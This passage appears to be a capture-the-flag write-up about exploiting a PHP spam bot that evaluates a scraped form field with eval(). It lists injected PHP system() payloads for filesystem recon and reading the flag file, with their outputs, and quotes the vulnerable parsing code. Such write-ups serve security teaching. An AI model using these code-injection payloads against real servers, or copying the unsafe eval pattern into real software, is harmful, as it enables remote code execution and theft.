With that information determined from the observed process, we can submit a link to a page with an invalid spam field to cause code execution. Since we did not know where the key was on the system, we had to execute a few recon commands to find it. All it takes it to host a form with some data.
This was the sample order:
1+1;
system(“pwd”, $var);
echo($var);
output: /var/www/spambot/
1+1;
system(“ls”, $var);
echo($var);
output: index.php
1+1;
system(“ls /var/www/”, $var);
echo($var);
output: spambot directory, guestbook directory
1+1;
system(“ls /”, $var);
echo($var);
output: normal linux files and: 6f170bcecda1ca8d3a5435591202988881b34bad
1+1;
system(“cat /6f170bcecda1ca8d3a5435591202988881b34bad”, $var);
echo($var);
output: the flag is OMG_EVAL_IS_EVIL_SPAM
The following code was taken from the index after:
preg_match("(.*[0-9].*[-+*].*)/Ui", $data, $secret);
$protection = $secret[1];
echo "[*] found spam protection: ".$protection."n";
eval("$solution = $protection;");
if(!is_numeric($solution)) {
die("[-] solution not numericn");
}
echo "[+] solved (".$spamField."): ".$solution."n";
eval() literally runs php code. Since we have complete control over the $protection variable, we can simply run shell commands on the server to print out the key.
Credit: Alex Lynch